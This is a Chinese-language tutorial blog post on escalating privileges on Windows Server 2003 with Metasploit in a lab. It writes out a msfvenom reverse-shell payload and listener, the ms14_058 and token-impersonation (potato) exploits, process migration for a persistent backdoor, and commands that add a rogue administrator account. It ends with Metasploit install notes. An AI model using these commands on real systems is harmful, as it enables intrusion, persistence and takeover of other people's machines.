【提权】metasploit提权方法

前言

  • metasploit 提权使用

常用的提权模块

metasploit 提权EXP存储文件夹路径

1
2
3
4
find / -name metasploit

一般都在
/usr/share/metasploit-framework/modules/exploits/windows/local

windows2003提权

环境:2003 server

1、生成攻击载荷

1
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=6666 -f exe > payload.exe

image-20210822161830954

2、接着在kali中运行msfconsole执行下面命令来监听(玩过msf应该都很熟悉)

1
2
3
4
5
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.108
set lport 6666
run

image-20210822162342445

3、首先去虚拟机中确认生成payload是否有用,发现得到session,可以去受害机进行执行获取session

image-20210822162555846

4、受害机已经获得shell了,然后上传这个payload去一个可读可写的目录,然后进行运行就可以拿到session,我直接用大马执行

image-20210822162940476

但是拿到的权限很低,接下来我们想办法上的system权限,但是getsystem/getprivs并不能在这里轻松提权

image-20210822163247489

5、接着用post里面的模块multi检测该系统可利用的提权模块

1
run post/multi/recon/local_exploit_suggester

image-20210822164314210

可以发现有很多,我们随便选一个ms14_058的吧,先background收起sessions,然后再进行利用

1
2
background
use exploit/windows/local/ms14_058_track_popup_menu

先看看sess的id以确定利用时所选的set

1
session -l 查看id

image-20210822164556586

然后set session 1

image-20210822164621415

接着提权成功,很自动化,很无脑提权到最高权限

image-20210822164659711

一些基础命令的使用和记录

1
2
ps 查看pid
migrate 3420 注入进程维持后门 这样每次系统启动都会连接服务器

image-20210822210706115

接着常规操作,有系统权限,增加用户

1
2
shell 进入cmd命令操作
net user gylq gylq /add & net localgroup administrators gylq /add 增加超级管理员

image-20210822211238723

对方在公网的话,直接登3389,kali的话用

1
rdesktop 192.168.0.115

image-20210822211628791

在介绍一下ms16-075的提权方法

还是回到普通权限

1、伪造身份

1
2
use incognito
list_tokens -u //查看当前伪造的身份

image-20210823131003045

2、执行一下ms075的potato.exe其实,上面已经显示可以提权了

1
execute -cH -f C:/RECYCLER/potato.exe

3、直接伪造系统身份

1
impersonate_token "NT AUTHORITY\SYSTEM"

image-20210823132854144

记录一些msf在centos安装采坑

安装msf的具体命令如下

1
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

接着本地出现msfinstall,然后给权限和安装

1
2
3
chmod 755 msfinstall

./msfinstall //就可以直接启动了

msf卸载方法(出现故障使用)

1
yum remove metasploit-framework

msfupdate之后需要进行环境变量配置

1
export PATH="/opt/metasploit-framework/bin:$PATH"

我的个人博客

孤桜懶契:http://gylq.gitee.io

本文标题:【提权】metasploit提权方法

文章作者:孤桜懶契

发布时间:2021年08月21日 - 16:30:01

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/110.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------